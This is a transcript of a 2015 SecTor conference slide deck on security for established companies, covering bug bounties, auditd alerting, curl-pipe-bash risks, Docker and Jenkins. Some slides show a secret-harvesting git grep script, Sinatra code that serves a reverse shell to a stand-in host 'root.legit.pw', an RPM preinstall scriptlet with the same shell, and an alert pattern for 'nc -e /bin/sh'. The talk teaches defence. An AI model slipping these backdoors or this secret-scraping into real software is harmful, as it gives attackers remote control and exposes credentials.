Security for non-Unicorns. SecTor 2015

C7bf554286ede7cb2786b5b19649c19b?s=47 Bea Hughes
October 20, 2015

Security for non-Unicorns. SecTor 2015

Security is becoming quite the thing nowadays, everyone wants to have some. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, whether you are established or if you're based in Silicon Valley and are about to write "the new hotness". However, what happens if your company is older than say, 6 months? You will already have some legacy systems and code. I'll be talking about how it's possible to unearth some of the security issues you may face, how to stop them happening, what happens when you do uncover them, and coping strategies for dealing with them.

C7bf554286ede7cb2786b5b19649c19b?s=128

Bea Hughes

October 20, 2015
Tweet

Transcript

  1. Security For Non-Unicorns 1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog @benjammingh for SecTor 2015 1

  2. Who's this clown? 2 » Infrastructure security at Etsy. »

    Recovered operations monkey at Puppet Labs. » Own a lot of black t-shirts. » Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 @benjammingh for SecTor 2015 2
  3. Setlist » Intros. (you are here). » Few real world

    problems & applications. » Fixes, or at least coping mechanisms. » Panicked summary based on time. » Comments thinly masked as questions. @benjammingh for SecTor 2015 3
  4. Security! @benjammingh for SecTor 2015 4

  5. Unicorns? @benjammingh for SecTor 2015 5

  6. The problem security is hard. @benjammingh for SecTor 2015 6

  7. From tiny seeds, do mighty acorns grow. » PinkiePwn's 6

    tiny bugs in Chrome to full sandbox escape. » Egor Homakov's 5 small bugs in Github to full private access on GitHub. » XSS to remote code execution in under an hour. » Username & password from HVAC system leads to $160+ Million Target breach. @benjammingh for SecTor 2015 7
  8. Things that are not security are hard too. @benjammingh for

    SecTor 2015 8
  9. Computerising is hard. No. 1 takeaway for security types is

    a sense of perspective. (maybe even humility! gasp) @benjammingh for SecTor 2015 9
  10. Security people aren't great secure coders. » Snort: 10 CVEs,

    Wireshark: 322! CVEs » Security Firm Bit9 Hacked, Used to Spread Malware » Joxean Koret on Breaking Antivurius software » Tavis from Project Zero on exploiting ESET » BEST! FireEye just running Apache/PHP as root ! @benjammingh for SecTor 2015 10
  11. So who do I trust? » No one? Always a

    great position for security people, who don't want to get paid. » Everyone? Do I have some emails with funny cats for you to click on. » Security vendors? If you have infinite money and no attackers. » Attackers! @benjammingh for SecTor 2015 11
  12. "You're already being probed for security holes, do you want

    to know or not?" @benjammingh for SecTor 2015 12
  13. Bug bounties 101: Have one! Bug Crowd vs. HackerOne @benjammingh

    for SecTor 2015 13
  14. Bug bounties 102: Prepare a lot. @benjammingh for SecTor 2015

    14
  15. Bug bounties 103: The first few weeks will be hell.

    @benjammingh for SecTor 2015 15
  16. Bug bounties 104: Be ready with bees! @benjammingh for SecTor

    2015 16
  17. Security on the inside @benjammingh for SecTor 2015 17

  18. Armadillo security architecture @benjammingh for SecTor 2015 18

  19. @benjammingh for SecTor 2015 19

  20. Cloud @benjammingh for SecTor 2015 20

  21. Github @benjammingh for SecTor 2015 21

  22. @benjammingh for SecTor 2015 22

  23. But this doesn't happen in real life, right? @benjammingh for

    SecTor 2015 23
  24. @benjammingh for SecTor 2015 24

  25. terrible bash example (don't do this) # for i in

    $(curl --silent 'https://api.github.com/orgs/<target>/members' \ # | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \ # do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \ # git clone https://github.com/$i/dotfiles.git $i ) \ # ; done for i in * ; do [ -d "$i/.git" ] || continue cd $i for revision in $(git rev-list --all) ; do unset PAGER export GIT_PAGER="" # find . -iname \*.key -or -iname \*.pem out="$(git grep -i -E "$1" ${revision} )" if [ $? -eq 0 ] ; then echo "${out}" | LANG="C" sed "s/^/$i: /" fi done cd .. done @benjammingh for SecTor 2015 25
  26. Go use Gitrob » http://michenriksen.com/blog/gitrob-putting-the-open- source-in-osint/ » https://github.com/michenriksen/gitrob @benjammingh for

    SecTor 2015 26
  27. Auditd @benjammingh for SecTor 2015 27

  28. Auditd Auditd is the best way to get command execution

    logged in your infrastructure. @benjammingh for SecTor 2015 28
  29. Auditd Auditd is the worst way to get this information

    to a log file. type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000.... typde=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl" type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax" type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 @benjammingh for SecTor 2015 29
  30. Mark Ellzey on Auditd. @benjammingh for SecTor 2015 30

  31. WHY? "Why are the logs multiline?" -- David Shing, aka

    "Shingy", aka "The Shing", aka "AOL's digital prophet" @benjammingh for SecTor 2015 31
  32. Multiline logs are the spawn of The Devil Oracle's Java

    @benjammingh for SecTor 2015 32
  33. Coping with multiline auditd » ELK: multiline filter in Logstash.

    » Other: github/gdestuynder/Audisp-json » Have cash, want a decent GUI (and more): Go use Threatstack! » Write something yourself in python & golang: I keep promising to OSS this ): @benjammingh for SecTor 2015 33
  34. Alert on sketchy things. (assumes ELK) 1. Elastalert from Yelp

    2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. @benjammingh for SecTor 2015 34
  35. curl | bash @benjammingh for SecTor 2015 35

  36. curl legit.pw | sh @benjammingh for SecTor 2015 36

  37. "But I check them, obviously!" @benjammingh for SecTor 2015 37

  38. Sinatra example get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return

    'nc -e /bin/sh root.legit.pw 2222 &' else return print_install_code() end end @benjammingh for SecTor 2015 38
  39. Sinatra example 2: Payback get '/install.sh' do ip = request.env['HTTP_CLIENT_IP']

    if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end @benjammingh for SecTor 2015 39
  40. @benjammingh for SecTor 2015 40

  41. @benjammingh for SecTor 2015 41

  42. curl | bash "But this is no worse than packages."

    foo$ sudo yum install sketchy foo$ sudo aptitude install sketchy @benjammingh for SecTor 2015 42
  43. curl | bash "but worse than downloading RPMs from a

    random site?" foo$ rpm --verify --check-sigs sketchy.1.33-7.rpm foo$ dpkg-sig --verify sketchy.1.33-7.deb @benjammingh for SecTor 2015 43
  44. curl | bash root# rpm -qp --scripts sketchy-1.33-7.rpm preinstall scriptlet

    (using /bin/sh): bash -c 'while : ; \ do \ nc -e /bin/sh root.legit.pw 2222 ;\ done' @benjammingh for SecTor 2015 44
  45. Verifiable This doesn't exist: foo$ curl legit.pw/sketch.sh | sudo sh

    --gpg-verify No one has ever done this: foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh @benjammingh for SecTor 2015 45
  46. curl | bash "But I trust HTTPS" » HTTPS certs

    cost ~$6. » If I can't make $6 by owning a system, I should probably stop being an attacker. » @letsencrypt will soon make this free. @benjammingh for SecTor 2015 46
  47. curl | bash curl -k @benjammingh for SecTor 2015 47

  48. curl --yolo | \ sudo sh --yolo @benjammingh for SecTor

    2015 48
  49. curl | bash What to do? @benjammingh for SecTor 2015

    49
  50. A LIVE DEMO, madness. @benjammingh for SecTor 2015 50

  51. Lightweight containers! @benjammingh for SecTor 2015 51

  52. chroot(8) @benjammingh for SecTor 2015 52

  53. FreeBSD Jails @benjammingh for SecTor 2015 53

  54. Solaris Zones @benjammingh for SecTor 2015 54

  55. AIX WPAR @benjammingh for SecTor 2015 55

  56. @benjammingh for SecTor 2015 56

  57. Is Docker secure? @benjammingh for SecTor 2015 57

  58. >30% of Images in Docker Hub Contain High Priority Security

    Vulns - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps @benjammingh for SecTor 2015 58
  59. >30% of MSDN CDs contain high priority security vulns @benjammingh

    for SecTor 2015 59
  60. @benjammingh for SecTor 2015 60

  61. As secure as Vagrant? @benjammingh for SecTor 2015 61

  62. But is Docker itself secure? » Don't run things as

    root. » No really, stop running things as root. » Did I mention not running things as root. » It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) @benjammingh for SecTor 2015 62
  63. Securify the Docker. » Don't use --privileged. » Use --cap-drop

    all and --cap-drop <thing> to get the minimum capabilities. » Use Docker Notary » Use GRSecurity (just do that anyway, if you can.) » Use SELinux... I may as well ask for a pony here. @benjammingh for SecTor 2015 63
  64. But is Docker secure? More secure than what? @benjammingh for

    SecTor 2015 64
  65. More secure than what? From whom? @benjammingh for SecTor 2015

    65
  66. @benjammingh for SecTor 2015 66

  67. Threat modelling for beginners 1. what are you actually defending

    against? 2. from whom? 3. for how much? @benjammingh for SecTor 2015 67
  68. Lateral movement > uid=0 @benjammingh for SecTor 2015 68

  69. <pinch of salt goes here> » I am not saying

    Docker is ZOMG unhackable. » it's just cgroups and namespacing. (just) » Escapes will happen. » They have a rad security team (Hi @diogomonica and @nathanmccauley) @benjammingh for SecTor 2015 69
  70. unpinchofsaltd » You can use it in a way that

    is secure, enough. » network separation & segregation still works. » secrets/credentials still a bigger problem. » PLEASE don't just adopt it because it's new & shiny. » ! " unikernels ✨ $ @benjammingh for SecTor 2015 70
  71. Jenkins! @benjammingh for SecTor 2015 71

  72. It's entire job is to take arbitrary code and run

    it, With access to some secret/credential @benjammingh for SecTor 2015 72
  73. It's literally remote code execution as a service. @benjammingh for

    SecTor 2015 73
  74. old crufty configs + all your code & secrets @benjammingh

    for SecTor 2015 74
  75. @benjammingh for SecTor 2015 75

  76. RCE as a service 6 6 Hacking Jenkins Servers With

    No Password @benjammingh for SecTor 2015 76
  77. Make Jenkins suck fewer * Disable execution on the master

    Jenkins host. * Disable anonymous access. * (Use travis, if you can) @benjammingh for SecTor 2015 77
  78. But what if Jenkins could be harnessed for good? @benjammingh

    for SecTor 2015 78
  79. NOT STOLEN FROM NickG's old 2012 deck. 7 7 Thanks

    Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security @benjammingh for SecTor 2015 79
  80. Jenkins as a force for [security] good » Gauntlt "be

    mean to your code" » https://github.com/secure-pipeline » Even Adobe blog on secure software, zomg! @benjammingh for SecTor 2015 80
  81. @benjammingh for SecTor 2015 81

  82. @benjammingh for SecTor 2015 82

  83. Summary » Computers are apparently hard. » Security is clearly

    harder still, obv. » Actually trust and humans is hard. » The typing is the easy bit. (ish) @benjammingh for SecTor 2015 83
  84. More Summary » Complex systems lead to much more complex

    security problems. (see Oauth) » Annual pen-tests don't scale, bug bounties can help. » Attackers are mining any public info you have (GitHub, S3, pastebin?) » No really, go check all your S3 buckets... @benjammingh for SecTor 2015 84
  85. Will there be a summary of summaries? » I beg

    you to stop trusting curl. » Auditd is awful, but it can be fewer awful. » Jenkins, you probably have to have one. » but that can be okay, nay, even useful for security. @benjammingh for SecTor 2015 85
  86. A summary appeared, what happened next will shock you »

    Docker and security can be used in the same sentence. » Understand your threat model (Apple's guide) » Don't be a FireEye, stop running things as root. @benjammingh for SecTor 2015 86
  87. Thank you » Twidder: @benjammingh » LinkedIn: lnkdin.me/p/benyeah » FidoNet:

    2:254/524.13 » JitHub: github.com/barn » SpeakerDeck: speakerdeck.com/barnbarn » Etsy: Careers <--- CodeAsCraft <--- our blog @benjammingh for SecTor 2015 87